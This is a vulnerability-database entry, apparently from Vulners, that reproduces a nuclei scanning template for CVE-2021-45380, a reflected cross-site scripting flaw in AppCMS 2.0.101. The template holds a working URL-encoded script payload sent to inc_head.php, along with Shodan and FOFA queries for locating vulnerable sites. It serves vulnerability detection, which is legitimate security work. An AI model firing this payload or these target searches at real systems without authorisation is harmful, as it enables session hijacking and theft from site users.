Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

AppCMS - Cross-Site Scripting

🗓️ 27 Jan 2022 18:43:40Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 23 Views

AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. Successful exploitation could allow execution of arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. Upgrade to the latest version to mitigate this vulnerability

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
ReporterTitlePublishedViews
Family
NVD		CVE-2021-45380
23 Jan 202217:15
nvd
Cvelist		CVE-2021-45380
23 Jan 202216:09
cvelist
Prion		Cross site scripting
23 Jan 202217:15
prion
Circl		CVE-2021-45380
27 Apr 202309:58
circl
CVE		CVE-2021-45380
23 Jan 202217:15
cve
CNVD		AppCMS Cross-Site Scripting Vulnerability (CNVD-2022-08032)
25 Jan 202200:00
cnvd
id: CVE-2021-45380

info:
  name: AppCMS - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/source-trace/appcms/issues/8
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45380
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-45380
    cwe-id: CWE-79
    epss-score: 0.00314
    epss-percentile: 0.70155
    cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: appcms
    product: appcms
    shodan-query:
      - http.html:"Powerd by AppCMS"
      - http.html:"powerd by appcms"
    fofa-query: body="powerd by appcms"
  tags: cve2021,cve,appcms,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '""></script><script>alert(document.domain)</script>'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044021f476d5083f128722e820258707ebd352da22a628b13ebdaaba006338c0b43d0022100d11d3f866b1e41b635c86466ba83fe60c192fd077067ee372926ab1501e66c94:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Jan 2022 18:40Current
6Medium risk
Vulners AI Score6
CVSS24.3
CVSS36.1
EPSS0.04332
cve-2021-45380appcmscross-site scriptingvulnerabilityexploitationjavascriptsession hijackingupgradelatest versionarbitrary codesensitive information
23
.json
Report